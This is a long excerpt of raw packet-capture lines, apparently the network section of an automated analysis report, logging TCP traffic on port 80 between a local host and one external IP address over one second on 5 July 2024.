                                                                Jul 5, 2024 04:23:24.187249899 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187257051 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187264919 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187280893 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187455893 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187467098 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187475920 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187504053 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187510967 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187517881 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187530041 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187540054 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187551975 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187561035 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187582970 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187609911 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187683105 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187694073 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187702894 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187712908 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187722921 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187727928 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187735081 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187747002 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187751055 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187758923 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187758923 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187784910 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187804937 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187881947 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187925100 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.187935114 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187944889 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.187979937 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188014984 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188024998 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188034058 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188045979 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188057899 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188069105 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188095093 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188165903 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188177109 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188185930 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188198090 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188208103 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188210011 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188221931 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188229084 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188246012 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188266039 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188267946 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188277006 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188287020 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.188304901 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.188316107 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.226566076 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226576090 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226587057 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226620913 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.226639032 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.226650953 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226663113 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226671934 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226682901 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226691008 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.226715088 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226720095 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.226727009 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226747036 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.226773024 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.226912022 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226955891 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.226988077 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.226999044 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227032900 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.227049112 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227058887 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227071047 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227082014 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227086067 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.227108955 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.227132082 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.227216005 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227226019 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227235079 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227246046 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.227262020 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.227287054 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246438980 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246458054 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246474028 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246509075 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246530056 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246534109 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246546984 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246572971 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246586084 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246615887 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246627092 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246635914 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246646881 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246656895 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246659994 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246682882 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246695042 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246701002 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246716976 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246743917 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246743917 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246754885 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246756077 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246767044 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246788025 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246809959 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246841908 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246851921 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246861935 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246871948 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246884108 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246887922 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246896029 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.246905088 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246922016 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.246947050 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.275763988 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275784016 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275794029 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275830030 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.275847912 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.275876045 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275886059 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275896072 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275911093 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.275928974 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.275947094 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275958061 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275968075 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275978088 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.275989056 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276011944 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276021957 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276074886 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276092052 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276127100 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276146889 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276164055 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276175022 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276182890 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276186943 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276200056 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276215076 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276240110 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276242018 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276282072 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276298046 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276339054 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276379108 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276390076 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276400089 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276417017 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276428938 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276462078 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276472092 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276534081 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276547909 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276560068 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276576996 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276611090 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276618958 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276623011 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276648998 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276667118 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276695013 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276715040 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276731968 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276731968 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276742935 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276755095 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276761055 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276761055 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276770115 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276783943 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276792049 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276793957 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276808977 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276823044 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276834965 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276845932 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276868105 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276876926 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276920080 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276932001 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276942015 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276956081 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276959896 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276962996 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276974916 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276983976 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.276992083 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.276992083 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277010918 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277115107 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277127028 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277156115 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277179003 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277188063 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277198076 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277209997 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277210951 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277221918 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277236938 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277259111 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277327061 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277338028 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277348042 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277359009 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277364016 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277369022 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277373075 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277381897 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277393103 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277393103 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277415991 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277429104 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277687073 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277697086 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277707100 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277724028 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277735949 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277746916 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277759075 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277770042 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277781963 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277786016 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277816057 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277851105 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277862072 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277870893 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277883053 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277890921 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277894020 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277899981 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.277904987 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277918100 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.277931929 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.278803110 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316093922 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316104889 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316113949 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316139936 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316164970 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316168070 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316179037 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316190958 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316201925 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316204071 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316211939 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316230059 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316323042 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316333055 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316342115 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316353083 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316360950 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316370010 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316414118 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316442013 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316452980 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316462994 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316478968 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316497087 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316504002 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316515923 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316525936 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316534996 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316545963 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316550970 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316559076 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316572905 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316586971 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316616058 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316652060 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316668034 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316705942 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.316844940 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.316884041 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.335714102 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335724115 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335732937 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335762024 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335771084 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335779905 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.335783005 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335824966 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335834026 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335844040 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335851908 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335851908 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.335851908 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.335864067 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.335890055 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.335923910 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335935116 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335944891 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.335963964 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.335977077 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.335990906 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.336008072 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336019039 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336029053 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336047888 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.336070061 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.336098909 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336110115 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336136103 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.336148977 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.336232901 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336244106 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336253881 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336266041 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336271048 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.336276054 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336287975 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336291075 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.336297989 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.336314917 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.336329937 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365318060 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365329027 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365339041 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365349054 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365359068 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365370989 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365381956 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365386963 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365425110 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365431070 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.365436077 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365447044 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.365464926 CEST4975380192.168.2.477.91.77.81
